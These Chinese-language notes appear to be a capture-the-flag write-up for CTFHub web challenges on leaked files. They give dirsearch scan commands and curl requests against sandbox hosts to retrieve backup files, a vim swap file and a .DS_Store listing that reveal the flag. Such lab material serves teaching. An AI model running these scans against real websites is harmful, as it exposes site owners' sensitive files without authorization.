在gtihub下载dirsearch
在cmd输入命令
python dirsearch.py -u <http://challenge-91f1f5e6a791ab02.sandbox.ctfhub.com:10080/> -e *
会扫描出备份文件,下载后,看到flag文件名,在url访问即可得到flag
用dirsearch扫描输入命令
python dirsearch.py -u <http://challenge-91f1f5e6a791ab02.sandbox.ctfhub.com:10080/> -e *
找到缓存文件并下载
用记事本打开就能看见flag
或者使用curl也可以
curl <http://challenge-c11057ca9f308893.sandbox.ctfhub.com:10080/.index.php.swp>
或者使用vim
vim -r index.php.swp
之所以.index.php.swp前面有点,是因为这是隐藏文件
先用dirsearch扫描
找到.DS_Store目录并访问,得到文件,打开,找到藏在里面的txt的文件名用curl访问
curl <http://challenge-29d518df22e66c57.sandbox.ctfhub.com:10080/d941f118577f141e83a78b3980372c58.txt>